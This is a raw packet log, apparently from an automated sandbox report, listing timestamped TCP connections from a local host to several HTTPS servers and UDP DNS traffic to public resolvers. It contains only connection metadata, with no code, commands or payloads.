Sep 29, 2024 06:06:36.868493080 CEST	443	49735	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:36.869791031 CEST	443	49735	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:36.869910002 CEST	443	49735	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:36.870007992 CEST	49735	443	192.168.2.4	185.199.109.153
Sep 29, 2024 06:06:36.870054007 CEST	443	49735	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:36.870106936 CEST	49735	443	192.168.2.4	185.199.109.153
Sep 29, 2024 06:06:36.871651888 CEST	443	49735	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:36.873579979 CEST	443	49735	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:36.873653889 CEST	443	49735	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:36.873724937 CEST	49735	443	192.168.2.4	185.199.109.153
Sep 29, 2024 06:06:36.873738050 CEST	443	49735	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:36.873779058 CEST	49735	443	192.168.2.4	185.199.109.153
Sep 29, 2024 06:06:36.874547958 CEST	443	49735	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:36.874686003 CEST	443	49735	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:36.875292063 CEST	49735	443	192.168.2.4	185.199.109.153
Sep 29, 2024 06:06:36.900068045 CEST	49735	443	192.168.2.4	185.199.109.153
Sep 29, 2024 06:06:36.900095940 CEST	443	49735	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:36.901699066 CEST	49736	443	192.168.2.4	185.199.109.153
Sep 29, 2024 06:06:36.943409920 CEST	443	49736	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:37.017268896 CEST	443	49736	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:37.018377066 CEST	443	49736	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:37.018446922 CEST	49736	443	192.168.2.4	185.199.109.153
Sep 29, 2024 06:06:37.018474102 CEST	443	49736	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:37.018491983 CEST	443	49736	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:37.018546104 CEST	49736	443	192.168.2.4	185.199.109.153
Sep 29, 2024 06:06:37.032063007 CEST	49736	443	192.168.2.4	185.199.109.153
Sep 29, 2024 06:06:37.032088041 CEST	443	49736	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:39.192734003 CEST	49742	443	192.168.2.4	142.250.185.132
Sep 29, 2024 06:06:39.192759991 CEST	443	49742	142.250.185.132	192.168.2.4
Sep 29, 2024 06:06:39.192847967 CEST	49742	443	192.168.2.4	142.250.185.132
Sep 29, 2024 06:06:39.194251060 CEST	49742	443	192.168.2.4	142.250.185.132
Sep 29, 2024 06:06:39.194263935 CEST	443	49742	142.250.185.132	192.168.2.4
Sep 29, 2024 06:06:39.856231928 CEST	443	49742	142.250.185.132	192.168.2.4
Sep 29, 2024 06:06:39.857778072 CEST	49742	443	192.168.2.4	142.250.185.132
Sep 29, 2024 06:06:39.857804060 CEST	443	49742	142.250.185.132	192.168.2.4
Sep 29, 2024 06:06:39.859137058 CEST	443	49742	142.250.185.132	192.168.2.4
Sep 29, 2024 06:06:39.859220982 CEST	49742	443	192.168.2.4	142.250.185.132
Sep 29, 2024 06:06:39.863595963 CEST	49742	443	192.168.2.4	142.250.185.132
Sep 29, 2024 06:06:39.863728046 CEST	443	49742	142.250.185.132	192.168.2.4
Sep 29, 2024 06:06:39.914002895 CEST	49742	443	192.168.2.4	142.250.185.132
Sep 29, 2024 06:06:39.914011002 CEST	443	49742	142.250.185.132	192.168.2.4
Sep 29, 2024 06:06:39.963397980 CEST	49742	443	192.168.2.4	142.250.185.132
Sep 29, 2024 06:06:40.026031017 CEST	49745	443	192.168.2.4	184.28.90.27
Sep 29, 2024 06:06:40.026084900 CEST	443	49745	184.28.90.27	192.168.2.4
Sep 29, 2024 06:06:40.026154995 CEST	49745	443	192.168.2.4	184.28.90.27
Sep 29, 2024 06:06:40.029532909 CEST	49745	443	192.168.2.4	184.28.90.27
Sep 29, 2024 06:06:40.029547930 CEST	443	49745	184.28.90.27	192.168.2.4
Sep 29, 2024 06:06:40.686609030 CEST	49746	443	192.168.2.4	185.199.109.153
Sep 29, 2024 06:06:40.686661959 CEST	443	49746	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:40.686734915 CEST	49746	443	192.168.2.4	185.199.109.153
Sep 29, 2024 06:06:40.687091112 CEST	49746	443	192.168.2.4	185.199.109.153
Sep 29, 2024 06:06:40.687107086 CEST	443	49746	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:40.689924002 CEST	443	49745	184.28.90.27	192.168.2.4
Sep 29, 2024 06:06:40.689996004 CEST	49745	443	192.168.2.4	184.28.90.27
Sep 29, 2024 06:06:40.693953991 CEST	49745	443	192.168.2.4	184.28.90.27
Sep 29, 2024 06:06:40.693972111 CEST	443	49745	184.28.90.27	192.168.2.4
Sep 29, 2024 06:06:40.694353104 CEST	443	49745	184.28.90.27	192.168.2.4
Sep 29, 2024 06:06:40.744519949 CEST	49745	443	192.168.2.4	184.28.90.27
Sep 29, 2024 06:06:40.911104918 CEST	49745	443	192.168.2.4	184.28.90.27
Sep 29, 2024 06:06:40.955403090 CEST	443	49745	184.28.90.27	192.168.2.4
Sep 29, 2024 06:06:41.097996950 CEST	443	49745	184.28.90.27	192.168.2.4
Sep 29, 2024 06:06:41.098089933 CEST	443	49745	184.28.90.27	192.168.2.4
Sep 29, 2024 06:06:41.098141909 CEST	49745	443	192.168.2.4	184.28.90.27
Sep 29, 2024 06:06:41.103230000 CEST	49745	443	192.168.2.4	184.28.90.27
Sep 29, 2024 06:06:41.103251934 CEST	443	49745	184.28.90.27	192.168.2.4
Sep 29, 2024 06:06:41.103266954 CEST	49745	443	192.168.2.4	184.28.90.27
Sep 29, 2024 06:06:41.103272915 CEST	443	49745	184.28.90.27	192.168.2.4
Sep 29, 2024 06:06:41.137928963 CEST	443	49746	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:41.155535936 CEST	49746	443	192.168.2.4	185.199.109.153
Sep 29, 2024 06:06:41.155565977 CEST	443	49746	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:41.156111002 CEST	443	49746	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:41.228363991 CEST	49746	443	192.168.2.4	185.199.109.153
Sep 29, 2024 06:06:41.429440022 CEST	49746	443	192.168.2.4	185.199.109.153
Sep 29, 2024 06:06:41.429689884 CEST	443	49746	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:41.430135012 CEST	49746	443	192.168.2.4	185.199.109.153
Sep 29, 2024 06:06:41.475402117 CEST	443	49746	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:41.545237064 CEST	443	49746	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:41.545559883 CEST	49746	443	192.168.2.4	185.199.109.153
Sep 29, 2024 06:06:41.545597076 CEST	443	49746	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:41.546252966 CEST	443	49746	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:41.546303034 CEST	49746	443	192.168.2.4	185.199.109.153
Sep 29, 2024 06:06:41.546312094 CEST	443	49746	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:41.548037052 CEST	443	49746	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:41.549757957 CEST	443	49746	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:41.549806118 CEST	49746	443	192.168.2.4	185.199.109.153
Sep 29, 2024 06:06:41.549815893 CEST	443	49746	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:41.551546097 CEST	443	49746	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:41.551595926 CEST	443	49746	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:41.551610947 CEST	49746	443	192.168.2.4	185.199.109.153
Sep 29, 2024 06:06:41.551619053 CEST	443	49746	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:41.551636934 CEST	49746	443	192.168.2.4	185.199.109.153
Sep 29, 2024 06:06:41.553308010 CEST	443	49746	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:41.553355932 CEST	49746	443	192.168.2.4	185.199.109.153
Sep 29, 2024 06:06:41.553364038 CEST	443	49746	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:41.559597015 CEST	443	49746	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:41.561635017 CEST	49746	443	192.168.2.4	185.199.109.153
Sep 29, 2024 06:06:41.767898083 CEST	49746	443	192.168.2.4	185.199.109.153
Sep 29, 2024 06:06:41.767992020 CEST	443	49746	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:41.855027914 CEST	49747	443	192.168.2.4	185.199.110.153
Sep 29, 2024 06:06:41.855127096 CEST	443	49747	185.199.110.153	192.168.2.4
Sep 29, 2024 06:06:41.855206966 CEST	49747	443	192.168.2.4	185.199.110.153
Sep 29, 2024 06:06:41.855897903 CEST	49747	443	192.168.2.4	185.199.110.153
Sep 29, 2024 06:06:41.855910063 CEST	443	49747	185.199.110.153	192.168.2.4
Sep 29, 2024 06:06:41.868443012 CEST	49748	443	192.168.2.4	184.28.90.27
Sep 29, 2024 06:06:41.868472099 CEST	443	49748	184.28.90.27	192.168.2.4
Sep 29, 2024 06:06:41.868557930 CEST	49748	443	192.168.2.4	184.28.90.27
Sep 29, 2024 06:06:41.869285107 CEST	49748	443	192.168.2.4	184.28.90.27
Sep 29, 2024 06:06:41.869292974 CEST	443	49748	184.28.90.27	192.168.2.4
Sep 29, 2024 06:06:42.328016996 CEST	443	49747	185.199.110.153	192.168.2.4
Sep 29, 2024 06:06:42.328355074 CEST	49747	443	192.168.2.4	185.199.110.153
Sep 29, 2024 06:06:42.328417063 CEST	443	49747	185.199.110.153	192.168.2.4
Sep 29, 2024 06:06:42.329463959 CEST	443	49747	185.199.110.153	192.168.2.4
Sep 29, 2024 06:06:42.329535007 CEST	49747	443	192.168.2.4	185.199.110.153
Sep 29, 2024 06:06:42.330049038 CEST	49747	443	192.168.2.4	185.199.110.153
Sep 29, 2024 06:06:42.330127001 CEST	443	49747	185.199.110.153	192.168.2.4
Sep 29, 2024 06:06:42.330220938 CEST	49747	443	192.168.2.4	185.199.110.153
Sep 29, 2024 06:06:42.330240011 CEST	443	49747	185.199.110.153	192.168.2.4
Sep 29, 2024 06:06:42.373769045 CEST	49747	443	192.168.2.4	185.199.110.153
Sep 29, 2024 06:06:42.431092978 CEST	443	49747	185.199.110.153	192.168.2.4
Sep 29, 2024 06:06:42.431159019 CEST	443	49747	185.199.110.153	192.168.2.4
Sep 29, 2024 06:06:42.431222916 CEST	49747	443	192.168.2.4	185.199.110.153
Sep 29, 2024 06:06:42.431255102 CEST	443	49747	185.199.110.153	192.168.2.4
Sep 29, 2024 06:06:42.432907104 CEST	443	49747	185.199.110.153	192.168.2.4
Sep 29, 2024 06:06:42.432964087 CEST	49747	443	192.168.2.4	185.199.110.153
Sep 29, 2024 06:06:42.432977915 CEST	443	49747	185.199.110.153	192.168.2.4
Sep 29, 2024 06:06:42.434359074 CEST	443	49747	185.199.110.153	192.168.2.4
Sep 29, 2024 06:06:42.434412003 CEST	49747	443	192.168.2.4	185.199.110.153
Sep 29, 2024 06:06:42.434425116 CEST	443	49747	185.199.110.153	192.168.2.4
Sep 29, 2024 06:06:42.437320948 CEST	443	49747	185.199.110.153	192.168.2.4
Sep 29, 2024 06:06:42.437352896 CEST	443	49747	185.199.110.153	192.168.2.4
Sep 29, 2024 06:06:42.437370062 CEST	49747	443	192.168.2.4	185.199.110.153
Sep 29, 2024 06:06:42.437383890 CEST	443	49747	185.199.110.153	192.168.2.4
Sep 29, 2024 06:06:42.437427044 CEST	49747	443	192.168.2.4	185.199.110.153
Sep 29, 2024 06:06:42.438771963 CEST	443	49747	185.199.110.153	192.168.2.4
Sep 29, 2024 06:06:42.445455074 CEST	443	49747	185.199.110.153	192.168.2.4
Sep 29, 2024 06:06:42.445511103 CEST	49747	443	192.168.2.4	185.199.110.153
Sep 29, 2024 06:06:42.445524931 CEST	443	49747	185.199.110.153	192.168.2.4
Sep 29, 2024 06:06:42.445564985 CEST	443	49747	185.199.110.153	192.168.2.4
Sep 29, 2024 06:06:42.445622921 CEST	49747	443	192.168.2.4	185.199.110.153
Sep 29, 2024 06:06:42.445702076 CEST	49747	443	192.168.2.4	185.199.110.153
Sep 29, 2024 06:06:42.445734024 CEST	443	49747	185.199.110.153	192.168.2.4
Sep 29, 2024 06:06:42.512928963 CEST	443	49748	184.28.90.27	192.168.2.4
Sep 29, 2024 06:06:42.513001919 CEST	49748	443	192.168.2.4	184.28.90.27
Sep 29, 2024 06:06:42.515527964 CEST	49748	443	192.168.2.4	184.28.90.27
Sep 29, 2024 06:06:42.515543938 CEST	443	49748	184.28.90.27	192.168.2.4
Sep 29, 2024 06:06:42.515803099 CEST	443	49748	184.28.90.27	192.168.2.4
Sep 29, 2024 06:06:42.518214941 CEST	49748	443	192.168.2.4	184.28.90.27
Sep 29, 2024 06:06:42.563416004 CEST	443	49748	184.28.90.27	192.168.2.4
Sep 29, 2024 06:06:42.790745974 CEST	443	49748	184.28.90.27	192.168.2.4
Sep 29, 2024 06:06:42.790941954 CEST	443	49748	184.28.90.27	192.168.2.4
Sep 29, 2024 06:06:42.791018009 CEST	49748	443	192.168.2.4	184.28.90.27
Sep 29, 2024 06:06:42.792360067 CEST	49748	443	192.168.2.4	184.28.90.27
Sep 29, 2024 06:06:42.792361021 CEST	49748	443	192.168.2.4	184.28.90.27
Sep 29, 2024 06:06:42.792412043 CEST	443	49748	184.28.90.27	192.168.2.4
Sep 29, 2024 06:06:42.792444944 CEST	443	49748	184.28.90.27	192.168.2.4
Sep 29, 2024 06:06:46.434794903 CEST	49749	443	192.168.2.4	52.165.165.26
Sep 29, 2024 06:06:46.434842110 CEST	443	49749	52.165.165.26	192.168.2.4
Sep 29, 2024 06:06:46.434936047 CEST	49749	443	192.168.2.4	52.165.165.26
Sep 29, 2024 06:06:46.436065912 CEST	49749	443	192.168.2.4	52.165.165.26
Sep 29, 2024 06:06:46.436078072 CEST	443	49749	52.165.165.26	192.168.2.4
Sep 29, 2024 06:06:47.127067089 CEST	443	49749	52.165.165.26	192.168.2.4
Sep 29, 2024 06:06:47.127197027 CEST	49749	443	192.168.2.4	52.165.165.26
Sep 29, 2024 06:06:47.133177996 CEST	49749	443	192.168.2.4	52.165.165.26
Sep 29, 2024 06:06:47.133197069 CEST	443	49749	52.165.165.26	192.168.2.4
Sep 29, 2024 06:06:47.133661032 CEST	443	49749	52.165.165.26	192.168.2.4
Sep 29, 2024 06:06:47.182574034 CEST	49749	443	192.168.2.4	52.165.165.26
Sep 29, 2024 06:06:47.763745070 CEST	49749	443	192.168.2.4	52.165.165.26
Sep 29, 2024 06:06:47.811398029 CEST	443	49749	52.165.165.26	192.168.2.4
Sep 29, 2024 06:06:47.988790989 CEST	443	49749	52.165.165.26	192.168.2.4
Sep 29, 2024 06:06:47.988856077 CEST	443	49749	52.165.165.26	192.168.2.4
Sep 29, 2024 06:06:47.988876104 CEST	443	49749	52.165.165.26	192.168.2.4
Sep 29, 2024 06:06:47.988913059 CEST	443	49749	52.165.165.26	192.168.2.4
Sep 29, 2024 06:06:47.988934040 CEST	49749	443	192.168.2.4	52.165.165.26
Sep 29, 2024 06:06:47.988953114 CEST	443	49749	52.165.165.26	192.168.2.4
Sep 29, 2024 06:06:47.988974094 CEST	443	49749	52.165.165.26	192.168.2.4
Sep 29, 2024 06:06:47.989012957 CEST	49749	443	192.168.2.4	52.165.165.26
Sep 29, 2024 06:06:47.989012957 CEST	49749	443	192.168.2.4	52.165.165.26
Sep 29, 2024 06:06:47.989043951 CEST	49749	443	192.168.2.4	52.165.165.26
Sep 29, 2024 06:06:47.993175030 CEST	443	49749	52.165.165.26	192.168.2.4
Sep 29, 2024 06:06:47.993248940 CEST	49749	443	192.168.2.4	52.165.165.26
Sep 29, 2024 06:06:47.993256092 CEST	443	49749	52.165.165.26	192.168.2.4
Sep 29, 2024 06:06:47.993360996 CEST	443	49749	52.165.165.26	192.168.2.4
Sep 29, 2024 06:06:47.993412018 CEST	49749	443	192.168.2.4	52.165.165.26
Sep 29, 2024 06:06:48.514245033 CEST	49749	443	192.168.2.4	52.165.165.26
Sep 29, 2024 06:06:48.514280081 CEST	443	49749	52.165.165.26	192.168.2.4
Sep 29, 2024 06:06:49.767584085 CEST	443	49742	142.250.185.132	192.168.2.4
Sep 29, 2024 06:06:49.767656088 CEST	443	49742	142.250.185.132	192.168.2.4
Sep 29, 2024 06:06:49.768076897 CEST	49742	443	192.168.2.4	142.250.185.132
Sep 29, 2024 06:06:51.032596111 CEST	49742	443	192.168.2.4	142.250.185.132
Sep 29, 2024 06:06:51.032629967 CEST	443	49742	142.250.185.132	192.168.2.4
Sep 29, 2024 06:07:03.188929081 CEST	54349	53	192.168.2.4	162.159.36.2
Sep 29, 2024 06:07:03.193819046 CEST	53	54349	162.159.36.2	192.168.2.4
Sep 29, 2024 06:07:03.193921089 CEST	54349	53	192.168.2.4	162.159.36.2
Sep 29, 2024 06:07:03.194032907 CEST	54349	53	192.168.2.4	162.159.36.2
Sep 29, 2024 06:07:03.198997974 CEST	53	54349	162.159.36.2	192.168.2.4
Sep 29, 2024 06:07:03.682905912 CEST	53	54349	162.159.36.2	192.168.2.4
Sep 29, 2024 06:07:03.683527946 CEST	54349	53	192.168.2.4	162.159.36.2
Sep 29, 2024 06:07:03.697442055 CEST	53	54349	162.159.36.2	192.168.2.4
Sep 29, 2024 06:07:03.697500944 CEST	54349	53	192.168.2.4	162.159.36.2
Sep 29, 2024 06:07:05.415054083 CEST	54351	443	192.168.2.4	52.165.165.26
Sep 29, 2024 06:07:05.415112019 CEST	443	54351	52.165.165.26	192.168.2.4
Sep 29, 2024 06:07:05.415174007 CEST	54351	443	192.168.2.4	52.165.165.26
Sep 29, 2024 06:07:05.415690899 CEST	54351	443	192.168.2.4	52.165.165.26
Sep 29, 2024 06:07:05.415704012 CEST	443	54351	52.165.165.26	192.168.2.4
Sep 29, 2024 06:07:06.157484055 CEST	443	54351	52.165.165.26	192.168.2.4
Sep 29, 2024 06:07:06.157668114 CEST	54351	443	192.168.2.4	52.165.165.26
Sep 29, 2024 06:07:06.159024954 CEST	54351	443	192.168.2.4	52.165.165.26
Sep 29, 2024 06:07:06.159039021 CEST	443	54351	52.165.165.26	192.168.2.4
Sep 29, 2024 06:07:06.159238100 CEST	443	54351	52.165.165.26	192.168.2.4
Sep 29, 2024 06:07:06.160290003 CEST	54351	443	192.168.2.4	52.165.165.26
Sep 29, 2024 06:07:06.207405090 CEST	443	54351	52.165.165.26	192.168.2.4
Sep 29, 2024 06:07:06.346152067 CEST	443	54351	52.165.165.26	192.168.2.4
Sep 29, 2024 06:07:06.346609116 CEST	54351	443	192.168.2.4	52.165.165.26
Sep 29, 2024 06:07:06.346653938 CEST	443	54351	52.165.165.26	192.168.2.4
Sep 29, 2024 06:07:06.346689939 CEST	54351	443	192.168.2.4	52.165.165.26
Sep 29, 2024 06:07:06.346793890 CEST	443	54351	52.165.165.26	192.168.2.4
Sep 29, 2024 06:07:06.346815109 CEST	443	54351	52.165.165.26	192.168.2.4
Sep 29, 2024 06:07:06.346992970 CEST	54351	443	192.168.2.4	52.165.165.26
Sep 29, 2024 06:07:07.519854069 CEST	54352	443	192.168.2.4	52.165.165.26
Sep 29, 2024 06:07:07.519908905 CEST	443	54352	52.165.165.26	192.168.2.4
Sep 29, 2024 06:07:07.519980907 CEST	54352	443	192.168.2.4	52.165.165.26
Sep 29, 2024 06:07:07.520952940 CEST	54352	443	192.168.2.4	52.165.165.26
Sep 29, 2024 06:07:07.520966053 CEST	443	54352	52.165.165.26	192.168.2.4
Sep 29, 2024 06:07:08.242927074 CEST	443	54352	52.165.165.26	192.168.2.4
Sep 29, 2024 06:07:08.243005037 CEST	54352	443	192.168.2.4	52.165.165.26
Sep 29, 2024 06:07:08.244678020 CEST	54352	443	192.168.2.4	52.165.165.26
Sep 29, 2024 06:07:08.244694948 CEST	443	54352	52.165.165.26	192.168.2.4
Sep 29, 2024 06:07:08.244937897 CEST	443	54352	52.165.165.26	192.168.2.4
Sep 29, 2024 06:07:08.245930910 CEST	54352	443	192.168.2.4	52.165.165.26
Sep 29, 2024 06:07:08.291407108 CEST	443	54352	52.165.165.26	192.168.2.4
Sep 29, 2024 06:07:08.504162073 CEST	443	54352	52.165.165.26	192.168.2.4
Sep 29, 2024 06:07:08.504201889 CEST	443	54352	52.165.165.26	192.168.2.4
Sep 29, 2024 06:07:08.504223108 CEST	443	54352	52.165.165.26	192.168.2.4
Sep 29, 2024 06:07:08.504295111 CEST	54352	443	192.168.2.4	52.165.165.26
Sep 29, 2024 06:07:08.504329920 CEST	443	54352	52.165.165.26	192.168.2.4
Sep 29, 2024 06:07:08.504395962 CEST	54352	443	192.168.2.4	52.165.165.26
Sep 29, 2024 06:07:08.506450891 CEST	443	54352	52.165.165.26	192.168.2.4
Sep 29, 2024 06:07:08.506517887 CEST	54352	443	192.168.2.4	52.165.165.26
Sep 29, 2024 06:07:08.506525040 CEST	443	54352	52.165.165.26	192.168.2.4
Sep 29, 2024 06:07:08.506537914 CEST	443	54352	52.165.165.26	192.168.2.4
Sep 29, 2024 06:07:08.506576061 CEST	54352	443	192.168.2.4	52.165.165.26
Sep 29, 2024 06:07:08.513602972 CEST	54352	443	192.168.2.4	52.165.165.26
Sep 29, 2024 06:07:08.513617992 CEST	443	54352	52.165.165.26	192.168.2.4
Sep 29, 2024 06:07:08.513628960 CEST	54352	443	192.168.2.4	52.165.165.26
Sep 29, 2024 06:07:08.513633966 CEST	443	54352	52.165.165.26	192.168.2.4
Sep 29, 2024 06:07:08.949882030 CEST	54353	443	192.168.2.4	52.165.165.26
Sep 29, 2024 06:07:08.950002909 CEST	443	54353	52.165.165.26	192.168.2.4
Sep 29, 2024 06:07:08.950258017 CEST	54353	443	192.168.2.4	52.165.165.26
Sep 29, 2024 06:07:08.950598001 CEST	54353	443	192.168.2.4	52.165.165.26
Sep 29, 2024 06:07:08.950634003 CEST	443	54353	52.165.165.26	192.168.2.4
Sep 29, 2024 06:07:09.780498981 CEST	443	54353	52.165.165.26	192.168.2.4
Sep 29, 2024 06:07:09.780587912 CEST	54353	443	192.168.2.4	52.165.165.26
Sep 29, 2024 06:07:09.782145977 CEST	54353	443	192.168.2.4	52.165.165.26
Sep 29, 2024 06:07:09.782162905 CEST	443	54353	52.165.165.26	192.168.2.4
Sep 29, 2024 06:07:09.782546043 CEST	443	54353	52.165.165.26	192.168.2.4
Sep 29, 2024 06:07:09.783565998 CEST	54353	443	192.168.2.4	52.165.165.26
Sep 29, 2024 06:07:09.831394911 CEST	443	54353	52.165.165.26	192.168.2.4
Sep 29, 2024 06:07:10.094885111 CEST	443	54353	52.165.165.26	192.168.2.4
Sep 29, 2024 06:07:10.094907045 CEST	443	54353	52.165.165.26	192.168.2.4
Sep 29, 2024 06:07:10.094930887 CEST	443	54353	52.165.165.26	192.168.2.4
Sep 29, 2024 06:07:10.094969988 CEST	54353	443	192.168.2.4	52.165.165.26
Sep 29, 2024 06:07:10.094996929 CEST	443	54353	52.165.165.26	192.168.2.4
Sep 29, 2024 06:07:10.095012903 CEST	54353	443	192.168.2.4	52.165.165.26
Sep 29, 2024 06:07:10.095047951 CEST	54353	443	192.168.2.4	52.165.165.26
Sep 29, 2024 06:07:10.098850012 CEST	443	54353	52.165.165.26	192.168.2.4
Sep 29, 2024 06:07:10.098893881 CEST	443	54353	52.165.165.26	192.168.2.4
Sep 29, 2024 06:07:10.098932981 CEST	54353	443	192.168.2.4	52.165.165.26
Sep 29, 2024 06:07:10.098951101 CEST	443	54353	52.165.165.26	192.168.2.4
Sep 29, 2024 06:07:10.098963976 CEST	54353	443	192.168.2.4	52.165.165.26
Sep 29, 2024 06:07:10.098967075 CEST	443	54353	52.165.165.26	192.168.2.4
Sep 29, 2024 06:07:10.099009037 CEST	54353	443	192.168.2.4	52.165.165.26
Sep 29, 2024 06:07:10.099201918 CEST	54353	443	192.168.2.4	52.165.165.26
Sep 29, 2024 06:07:10.099220037 CEST	443	54353	52.165.165.26	192.168.2.4
Sep 29, 2024 06:07:10.099231005 CEST	54353	443	192.168.2.4	52.165.165.26
Sep 29, 2024 06:07:10.099236012 CEST	443	54353	52.165.165.26	192.168.2.4
Sep 29, 2024 06:07:30.968745947 CEST	55704	53	192.168.2.4	1.1.1.1
Sep 29, 2024 06:07:30.973604918 CEST	53	55704	1.1.1.1	192.168.2.4
Sep 29, 2024 06:07:30.973660946 CEST	55704	53	192.168.2.4	1.1.1.1
Sep 29, 2024 06:07:30.973710060 CEST	55704	53	192.168.2.4	1.1.1.1
Sep 29, 2024 06:07:30.978472948 CEST	53	55704	1.1.1.1	192.168.2.4
Sep 29, 2024 06:07:31.426904917 CEST	53	55704	1.1.1.1	192.168.2.4
Sep 29, 2024 06:07:31.427911043 CEST	55704	53	192.168.2.4	1.1.1.1
Sep 29, 2024 06:07:31.433142900 CEST	53	55704	1.1.1.1	192.168.2.4
Sep 29, 2024 06:07:31.433192015 CEST	55704	53	192.168.2.4	1.1.1.1
Sep 29, 2024 06:07:39.308450937 CEST	55708	443	192.168.2.4	142.250.74.196
Sep 29, 2024 06:07:39.308490992 CEST	443	55708	142.250.74.196	192.168.2.4
Sep 29, 2024 06:07:39.308557987 CEST	55708	443	192.168.2.4	142.250.74.196
Sep 29, 2024 06:07:39.309295893 CEST	55708	443	192.168.2.4	142.250.74.196
Sep 29, 2024 06:07:39.309317112 CEST	443	55708	142.250.74.196	192.168.2.4
Sep 29, 2024 06:07:39.836483002 CEST	49723	80	192.168.2.4	93.184.221.240
Sep 29, 2024 06:07:39.836698055 CEST	49724	80	192.168.2.4	93.184.221.240
Sep 29, 2024 06:07:39.841676950 CEST	80	49723	93.184.221.240	192.168.2.4
Sep 29, 2024 06:07:39.841739893 CEST	49723	80	192.168.2.4	93.184.221.240
Sep 29, 2024 06:07:39.842278004 CEST	80	49724	93.184.221.240	192.168.2.4
Sep 29, 2024 06:07:39.842335939 CEST	49724	80	192.168.2.4	93.184.221.240
Sep 29, 2024 06:07:39.963224888 CEST	443	55708	142.250.74.196	192.168.2.4
Sep 29, 2024 06:07:39.970519066 CEST	55708	443	192.168.2.4	142.250.74.196
Sep 29, 2024 06:07:39.970536947 CEST	443	55708	142.250.74.196	192.168.2.4
Sep 29, 2024 06:07:39.971355915 CEST	443	55708	142.250.74.196	192.168.2.4
Sep 29, 2024 06:07:39.972064018 CEST	55708	443	192.168.2.4	142.250.74.196
Sep 29, 2024 06:07:39.972242117 CEST	443	55708	142.250.74.196	192.168.2.4
Sep 29, 2024 06:07:40.023798943 CEST	55708	443	192.168.2.4	142.250.74.196
Sep 29, 2024 06:07:49.867754936 CEST	443	55708	142.250.74.196	192.168.2.4
Sep 29, 2024 06:07:49.867837906 CEST	443	55708	142.250.74.196	192.168.2.4
Sep 29, 2024 06:07:49.867897987 CEST	55708	443	192.168.2.4	142.250.74.196
Sep 29, 2024 06:07:50.963363886 CEST	55708	443	192.168.2.4	142.250.74.196
Sep 29, 2024 06:07:50.963393927 CEST	443	55708	142.250.74.196	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 29, 2024 06:06:34.767487049 CEST	53	58259	1.1.1.1	192.168.2.4
Sep 29, 2024 06:06:34.779865980 CEST	53	49490	1.1.1.1	192.168.2.4
Sep 29, 2024 06:06:35.818033934 CEST	53	50100	1.1.1.1	192.168.2.4
Sep 29, 2024 06:06:35.983374119 CEST	55569	53	192.168.2.4	1.1.1.1
Sep 29, 2024 06:06:35.983562946 CEST	51354	53	192.168.2.4	1.1.1.1
Sep 29, 2024 06:06:35.991734982 CEST	53	55569	1.1.1.1	192.168.2.4
Sep 29, 2024 06:06:35.993345976 CEST	53	51354	1.1.1.1	192.168.2.4
Sep 29, 2024 06:06:37.043011904 CEST	53	58824	1.1.1.1	192.168.2.4
Sep 29, 2024 06:06:39.183841944 CEST	51883	53	192.168.2.4	1.1.1.1
Sep 29, 2024 06:06:39.184104919 CEST	65310	53	192.168.2.4	1.1.1.1
Sep 29, 2024 06:06:39.190707922 CEST	53	51883	1.1.1.1	192.168.2.4
Sep 29, 2024 06:06:39.190812111 CEST	53	65310	1.1.1.1	192.168.2.4
Sep 29, 2024 06:06:39.206350088 CEST	53	54750	1.1.1.1	192.168.2.4
Sep 29, 2024 06:06:41.844738007 CEST	62575	53	192.168.2.4	1.1.1.1
Sep 29, 2024 06:06:41.845052004 CEST	58652	53	192.168.2.4	1.1.1.1
Sep 29, 2024 06:06:41.853627920 CEST	53	58652	1.1.1.1	192.168.2.4
Sep 29, 2024 06:06:41.853647947 CEST	53	62575	1.1.1.1	192.168.2.4
Sep 29, 2024 06:06:51.408565044 CEST	138	138	192.168.2.4	192.168.2.255
Sep 29, 2024 06:06:53.579330921 CEST	53	53608	1.1.1.1	192.168.2.4
Sep 29, 2024 06:07:03.188138008 CEST	53	61948	162.159.36.2	192.168.2.4
Sep 29, 2024 06:07:03.711086035 CEST	53466	53	192.168.2.4	1.1.1.1
Sep 29, 2024 06:07:03.732239962 CEST	53	53466	1.1.1.1	192.168.2.4
Sep 29, 2024 06:07:30.968406916 CEST	53	60266	1.1.1.1	192.168.2.4
Sep 29, 2024 06:07:39.298681021 CEST	64792	53	192.168.2.4	1.1.1.1
Sep 29, 2024 06:07:39.306382895 CEST	53	64792	1.1.1.1	192.168.2.4

DNS Queries

